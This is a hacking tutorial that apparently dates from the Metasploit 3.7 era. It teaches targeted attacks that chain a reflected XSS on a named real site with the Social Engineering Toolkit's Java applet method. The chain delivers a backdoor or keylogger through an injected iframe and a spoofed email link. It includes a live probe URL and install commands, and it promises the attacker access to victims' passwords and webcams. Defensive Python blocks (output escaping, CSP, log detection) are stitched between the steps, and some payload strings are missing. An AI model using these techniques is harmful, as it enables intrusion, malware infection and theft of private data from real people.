Targeted attacks via non-persistent xss by speakeasy

    Targeted attacks via non-persistent xss
    by speakeasy
     
    Non-persistent XSS attacks can be an extremely effective way to completely take control of a website or server. They are effective because they exploit a weak factor that is present in *every* system - people.
     
    This tutorial should give you an introduction to using non-persistent XSS for targeted attacks, whether it's for attacking government organisations, or fucking with your best friend.
     
    What you will need:
     
    A server with the metasploit framework
    The social engineering toolkit also on that server
    an apache webserver on that server
    a backdoor in an exe format
    ssh client (I recommend putty for windows)
    sftp client (I recommend filezilla)
    common sense
     
     
    STEP 1
     
    The first thing we need to do is know our victim. Know what he likes and what he dislikes. Know his formal and informal relationships. Know who he trusts and distrusts. The process of finding this information is a skill in itself, and there are a number of good tutorials on it.
     
    Now we need to find a site that we can trick them into visiting which is vulnerable to an XSS. Make a list of sites and then copy this string into the search box:
     
    “>
     
    I searched for "games" in Google, and found an XSS in my second site, http://www.addictinggames.com. Unfortunately most browsers filter this, but you should see a warning notice in Internet Explorer if you are successful, which can be shown using the URL:
     
    http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%E2%80%9C%3E%3Cscript%3Ealert%28%E2%80%98xss_here%E2%80%99%29%3B%3C%2Fscript%3E
     
    or this screenshot in case it has been fixed:
     
    http://i.imgur.com/rKDLr.png
     
    Now the problem here is that browsers try to block the scripts we add to prevent cookie theft, but there is an easy way around that: don't use scripts at all!
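From the defender's side, the reflection this step depends on, and the reason a browser script filter is not enough (script-free markup is still live markup), can be shown with a small model of the search page. This is an added example, not code from the tutorial or from the site mentioned above; the template, the function names, the probe strings and the CSP value are constructed for illustration.

```python
import html
from urllib.parse import unquote

# Constructed probe strings. The first is the tutorial's own link, decoded;
# the second is the kind of script-free markup that browser XSS filters let
# through. Both are test inputs for the defence, not live payloads.
SCRIPT_PROBE = unquote(
    "%E2%80%9C%3E%3Cscript%3Ealert%28%E2%80%98xss_here%E2%80%99%29%3B%3C%2Fscript%3E"
)
IFRAME_PROBE = '"><iframe src="https://example.invalid/" width="1" height="1"></iframe>'

# Hypothetical template modelled on the pattern described above: the "text"
# parameter is reflected into an attribute value and into page text.
TEMPLATE = '<input type="text" name="text" value="{term}"><p>Results for {term}</p>'


def render_vulnerable(term: str) -> str:
    """Reflects the query verbatim: '">' closes the attribute and the tag,
    and everything after it is parsed as live markup."""
    return TEMPLATE.format(term=term)


def render_hardened(term: str) -> str:
    """HTML-encodes the query before reflection. quote=True also encodes
    the double and single quote, so the attribute cannot be closed early."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


def injects_tag(rendered: str) -> bool:
    """Check used by the tests: does the page contain an element the
    template itself never emits?"""
    lowered = rendered.lower()
    return "<script" in lowered or "<iframe" in lowered


# Defence in depth for reflections that slip through: no framing of other
# origins and no inline script, enforced by the browser regardless of the
# search code. (Header value assumed for illustration.)
CSP_HEADER = "default-src 'self'; frame-src 'none'; script-src 'self'"
```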
     
    STEP 2
     
    I bet you were wondering why we needed that web server; well, it's critical to this attack (unless you're attacking someone on your own network).
     
    Install the metasploit framework and the social engineering toolkit on your server, then ssh in. On my ubuntu server I can install metasploit with the binary installer like this:
     
    wget http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run
    chmod +x framework-3.7.2-linux-x64-full.run
    sudo ./framework-3.7.2-linux-x64-full.run
     
    (remember to use the version appropriate to your system), and the Social Engineering Toolkit via subversion using:
     
    svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
    cd SET/
     
    and run it using:
     
    python set
     
    (you may first need to install python with apt-get install python)
     
    Now that this is set up it's time to get on with the attack. Run the Social Engineering Toolkit and select:
    2.  Website Attack Vectors
    followed by:
    1. The Java Applet Attack Method
    then:
    1. Web Templates
    and finally:
    1. Java Required
     
    and whatever options you want for creating your metasploit payload; we won't be using it for this tutorial. If you get the error:
    [!] Metasploit path not found. Enter path to framework directory:
    then you will need to enter the path to the directory where you installed metasploit, and the config file should be automatically updated.
     
    There are a couple of things we need to change now, so log in with your sftp client.
    cd to your web server's root directory (/var/www for Apache).
    Edit the index.html file, being careful not to ruin the important code; this should be fairly obvious.
    In this case we can change the background, fonts and text to make it seem like a game should be here but requires Java, but I will leave mine as it is for this tutorial. The second thing we need to do is change the payload. In Apache's root directory there should be a file with a random string of letters as its name. We need to upload our payload (backdoor, keylogger etc.) and replace that file on the server with it. For this tutorial I will use an exe that pops up a message box saying "you got pwnd". If I visit the site and allow Java, I get this:
     
    http://i.imgur.com/CyHw5.png
     
    STEP 3
     
    This is where we combine what we have so far. We will use the XSS to add an iframe to our target page. ">
    You can either make the iframe the correct size for a game or map, or you can make it invisible; there is plenty of information about this on the internet.
     
    Now enter your iframe code into the search box, copy the resulting link from the address bar, and send it to the target via a spoofed email or pass it to them in conversation.
     
    The finished result should have no trouble tricking a user who sees and trusts the site's URL, especially considering the number of windows we click through without even looking: http://i.imgur.com/ukDzD.png
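A defender watching the vulnerable site's access logs can spot the links this step produces, because the iframe markup has to travel in the query string of the search request. This detection sketch is an added example, not part of the tutorial; the log lines and the IP addresses in them are constructed, and the path and parameter names follow the search URL quoted in step 1.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines, not real traffic. Only the second
# request carries tag markup in the "text" parameter, URL-encoded the way
# the tutorial's example link is; the third is a harmless <b> search term.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2012:10:00:01 +0000] "GET /static/php/game/searchPage.php?pageAction=search&text=tetris HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2012:10:00:07 +0000] "GET /static/php/game/searchPage.php?pageAction=search&text=%22%3E%3Ciframe%20src%3D%22http%3A%2F%2F198.51.100.7%2F%22%3E HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2012:10:00:09 +0000] "GET /static/php/game/searchPage.php?pageAction=search&text=%3Cb%3Ebold%3C%2Fb%3E HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

# client ip ... [timestamp] "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Elements that indicate markup injection rather than an ordinary search term.
DANGEROUS_TAG_RE = re.compile(r"<\s*(script|iframe|object|embed|img|svg)\b", re.I)


def find_reflected_probes(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client_ip, parameter, decoded_value) for every request whose
    query string carries a dangerous tag in any parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                # parse_qs decoded once; a second unquote catches double-encoding
                decoded = unquote(value)
                if DANGEROUS_TAG_RE.search(decoded):
                    hits.append((ip, name, decoded))
    return hits
```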
     
    STEP 4
     
    If you installed something good on their computer you now have access to all of their passwords and private information, as well as their webcam ;), and they probably recently gained a large collection of questionable pornography.
     
    use as you will,
    good luck.
     
      _______                       __    
     |   _   |.-----..-----..---.-.|  |--.
     |   1___||  _  ||  -__||  _  ||    <
     |____   ||   __||_____||___._||__|__|
     |:  1   ||__|                        
     |::.. . |      _.._..,_,_                      
     `-------'     (          )
                    ]~,"-.-~~[
                  .=])' (;  ([
                  | ]:: '    [
                  '=]): .)  ([
                    |:: '    |
                     ~~----~~